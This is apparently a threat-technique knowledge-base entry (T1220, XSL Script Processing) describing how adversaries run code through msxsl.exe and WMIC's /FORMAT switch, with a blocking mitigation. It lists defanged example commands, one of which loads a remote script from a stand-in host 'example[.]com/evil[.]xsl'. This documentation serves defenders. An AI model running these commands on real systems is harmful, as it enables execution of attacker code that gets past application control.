T1220 XSL Script Processing
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages.
msxsl.exe customers[.]xml script[.]xsl
msxsl.exe script[.]xsl script[.]xsl
msxsl.exe script[.]jpeg script[.]jpeg
Another variation of this technique, dubbed “Squiblytwo”, involves using Windows Management Instrumentation to invoke JScript or VBScript within an XSL file. This technique can also execute local/remote scripts and, similar to its Regsvr32/ “Squiblydoo” counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in Windows Management Instrumentation provided they utilize the /FORMAT switch.
- Local File:
wmic process list /FORMAT:evil[.]xsl
- Remote File:
wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”
||17 October 2018
||05 May 2022
||If msxsl.exe is unnecessary, then block its execution to prevent abuse by adversaries.